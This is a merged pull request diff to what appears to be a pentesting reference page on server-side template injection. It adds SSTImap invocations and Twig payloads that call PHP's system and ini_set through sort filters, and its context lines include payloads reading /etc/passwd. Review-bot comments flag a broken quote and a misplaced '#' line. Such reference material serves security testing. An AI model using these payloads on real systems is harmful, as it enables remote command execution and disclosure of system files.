Merge pull request #778 from vladko312/patch-1

Added SSTImap tool and Twig payloads
Carlos Polop 2024-01-10 23:11:04 +01:00 committed by GitHub
commit defc06c1da
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23


@ -125,6 +125,14 @@ tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..." tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
``` ```
### [SSTImap](https://github.com/vladko312/sstimap)
```bash
python3 sstimap.py -i -l 5
python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
python3 sstimap.py -u 'https://example.com/page?name=John' -s
```
### [Tplmap](https://github.com/epinna/tplmap) ### [Tplmap](https://github.com/epinna/tplmap)
```python ```python
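Review bot: The second added SSTImap command, `python3 sstimap.py -u "http://example.com/ --crawl 5 --forms`, opens a double quote around the URL and never closes it, so the shell will treat `--crawl 5 --forms` as part of the URL and wait for more input when the line is pasted. Close the quote after `http://example.com/`. The three commands also mix double and single quotes around the URL and carry no comment saying what each invocation is for; a one-line `#` comment above each, as a bash block allows, would let a reader pick the right one without opening the tool's help.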
@ -539,6 +547,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
{{['id']|filter('system')}} {{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}}
{{['id',""]|sort('system')}}
#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}
``` ```
**Twig - Template format** **Twig - Template format**
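Review bot: The added line `#Hide warnings and errors for automatic exploitation` sits inside the payload block, but a leading `#` is not a comment in Twig, so anyone copying the block wholesale sends that sentence as literal template text. Either move the explanation into prose outside the fence or write it as a Twig comment with `{# ... #}`. The two new `sort` payloads also quote differently (`sort('system')` with single quotes, `sort("ini_set")` with double) and the first one passes an empty second element in `['id',""]` without saying why; a short note on that, and on how these differ from the existing `filter('system')` lines, would make the addition self-explanatory.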
@ -1040,6 +1052,8 @@ If you think it could be useful, read:
{% embed url="https://github.com/Hackmanit/TInjA" %} {% embed url="https://github.com/Hackmanit/TInjA" %}
{% embed url="https://github.com/vladko312/sstimap" %}
{% embed url="https://github.com/epinna/tplmap" %} {% embed url="https://github.com/epinna/tplmap" %}
{% embed url="https://github.com/Hackmanit/template-injection-table" %} {% embed url="https://github.com/Hackmanit/template-injection-table" %}